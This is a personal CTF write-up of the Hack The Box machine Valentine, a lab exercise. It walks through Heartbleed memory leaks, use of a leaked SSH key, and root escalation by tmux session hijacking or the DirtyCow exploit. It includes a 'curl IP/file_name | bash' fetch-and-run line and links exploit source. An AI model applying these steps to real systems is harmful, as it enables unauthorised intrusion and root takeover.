HTB: Valentine (Linux) Write-up Exploiting heartbleed/finding juicy bash history & dirtycow for PE

Today, I’m getting into the Valentine Box on HTB. (The V-day is also coming close!)
As usual, I attempted to hack it myself and used IppSec’s walkthrough for reference. https://youtu.be/XYXNvemgJUo

What I learned today/ Reminder

  • vim set:paste option
  • ssh naming convension -> username_key
  • ssh private key — make sure to paste everything! (I forgot to paste the last line and couldn’t log in for a min) -> ssh -i privatekey
  • nmap — script vuln -oA 10.129.169.179 — this will run a vuln scan
    Confirm the hearbleed vulnerability by:
  • sslyze — heartbleed -> sslyze has more options
  • heartbleed — running with -x shows the hex views \
    change the payload length around to see if it leaks some important info (kinda pain in the ass)
  • To see all root running processes, run
    ps -ef | grep root
  • Running a tmux file: tmux -S /.devs/dev_sess
    https://www.man7.org/linux/man-pages/man1/tmux.1.html Tmux manual page

tmux is a terminal multiplexer: it enables a number of terminals to
be created, accessed, and controlled from a single screen. tmux
may be detached from a screen and continue running in the
background, then later reattached.

When tmux is started it creates a new session with a single window
and displays it on screen. A status line at the bottom of the
screen shows information on the current session and is used to
enter interactive commands.

  • dirtycow exploit creates a root account with the username, firefart with the password specified! — after the exploit, you can switch user to the new account: Easy win!

Transfer and execute it on bash < curl IP/file_name | bash (to execute it) >

Nmap Result:

Host is up (0.11s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018–02–06T00:45:25
|_Not valid after: 2019–02–06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022–01–27T04:16:16+00:00; -1s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s

HTTP Enum:

This is great.

Gobuster-ed it:

\

Found /dev /encode /decode

Convert this to ASCII

Found a SSH PRIVATE KEY!!

Found the decode and encode pages.

It looks like it’s base64 decode and encryption scripts that they’re running.

I went ahead and did more server enum!

Since 2.2.2 is end of life, let’s run a vuln scan!

nmap — script vuln -oA 10.129.169.179 (NEW)

Running the script, I found heartbleed vuln.

Confirm the hearbleed vulnerability by:

sslyze — heartbleed

What’s heartbleed?​

xkcd: Heartbleed Explanation

— run it with -x option to see the hex view.

Change the payload length to see something comes up.

0x20 -> 2000

0xff -> max

hmmm… didn’t work. Let’s run it for 100 times with -n 100 options

​aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

base64!​

Decode it with the web app thingie.

Got the password?

— —

chmod 600 hype.key so we can use that key. (can read and write but not execute)

try to ssh into it

ssh -i hype.key hype@IP

(Guessing the username since we see the ssh naming convension on the file username_key)

I’m in user “hype”!

Privilege Escalation

Run LinEnum.sh

curl IP/file_name | bash (to execute it)

Couldn’t find much at glance

run history:

What’s tmux -L dev_sess

To see all root running processes, run

ps -ef | grep root

we see that it’s owned by root but can be ran by us!

Let’s run the tmux file with:

tmux -S /.devs/dev_sess

and now we are running it as root!

Priv Esc Method2: DirtyCow

Download the exploit via https://dirtycow.ninja/ https://github.com/FireFart/dirtycow/blob/master/dirty.c

paste it through vim — :set paste (NEW)

Find a compile method from the file: grep gcc dirty.cow

run it.

and now the password is an account is created with the username firefart with the password firefart.

let’s try switching the user to firefart

Valentine is now hacked with the root user, firefart!

捕獲完了!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store